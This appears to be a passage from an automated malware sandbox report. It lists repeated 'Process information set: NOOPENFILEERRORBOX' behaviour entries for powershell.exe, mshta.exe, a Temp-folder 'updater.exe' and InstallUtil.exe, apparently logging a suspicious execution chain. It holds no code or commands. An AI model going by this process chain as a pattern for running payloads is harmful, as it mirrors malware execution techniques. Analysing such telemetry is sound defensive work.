                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
